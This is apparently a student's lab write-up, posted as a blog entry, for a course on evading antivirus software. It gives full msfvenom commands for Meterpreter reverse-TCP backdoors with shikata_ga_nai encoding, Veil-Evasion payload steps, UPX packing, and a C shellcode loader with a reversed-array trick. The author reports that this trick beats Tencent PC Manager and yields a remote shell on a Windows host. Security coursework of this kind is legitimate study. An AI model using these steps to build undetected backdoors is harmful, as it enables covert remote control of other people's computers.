20155305《网络对抗》免杀原理与实践

20155305《网络对抗》免杀原理与实践

实验主要过程

1、免杀效果参考基准

  • Kali使用上次实验msfvenom产生后门的可执行文件,刚刚传送到Win主机就被电脑管家查杀了恢复后这次放入老师提供的网址http://www.virscan.org/进行扫描,有48%的杀软报告病毒。

2、使用msf编码器

  • 编码一次
    Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5305端口号 -f exe >自己起后门名字.exe

理论上会降低被查出率,但因为老师说由于使用的这个编码平台太著名了,很容易被杀软盯上,所以实际上并没有什么变化。网站监测结果是51%的杀软报告病毒,还不如不编码呢(高了两个百分点)。

回连成功

  • 多次编码
    Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5305端口号 -f exe > 自己起后门名字.exe

多次编码依旧没有任何作用,被电脑管家查杀,恢复后放入网站检查

尝试回连,录音功能成功

3、使用Veil-Evasion重新编写源代码

  • 在Kali中安装veil,sudo apt-get install veil,这其中有paython的安装可能有些电脑没有wine32,所以需要安装apt-get install wine32

  • 在Kali的终端中启动Veil-Evasion
    命令行中输入veil,后在veil中输入命令use evasion
    依次输入如下命令生成你的可执行文件:

use python/meterpreter/rev_tcp.py(设置payload)

set LHOST Kali的IP(设置反弹连接IP)

set LPORT 端口号(设置反弹端口)

generate
可执行文件名

选择使用语言来编写

根据生成路径找到生成的可执行文件,放到网上进行检测,有20%的杀软报告病毒,这个异常难安装的veil加python终于降低了被查杀率,还是有些效果的。
尝试回连,拍照功能成功

4、UPX加壳尝试

命令upx 5305.exe -o 5305-2.exe

upx加壳后的5305-2.exe看着很牛皮,但是被电脑管家妥妥查杀了。。。

再在网站扫描一下,百分之48的惊人数据说明upx加壳没什么用啊

5、C语言调用Shellcode

  • 首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。

  • VS编译运行产生exe文件(exe文件名不能存在20155305这样的学号因为网站检测时会说有明显广告语。。)

  • 只有百分之十二的杀软报告发现病毒,免杀效果非常可观,重点是我的腾讯管家没有弹出警告,有点遗憾,但有觉得免杀学会了之后确实有点厉害哦

  • 优化

上面的结果已经不错了,但是还可以更好,比如逆序修改Shellcode数组,然后再用它替换上面的c文件里原本的Shellcode数组。编译运行后结果有了很大提升,电脑管家没有查杀出来,优化前后均可实现杀软共生

6、实测优化版本、回连成功

按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软(Win安装腾讯电脑管家 )的情况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限

posted @ 2018-04-08 07:22  qiaolei  阅读(259)  评论(0编辑  收藏  举报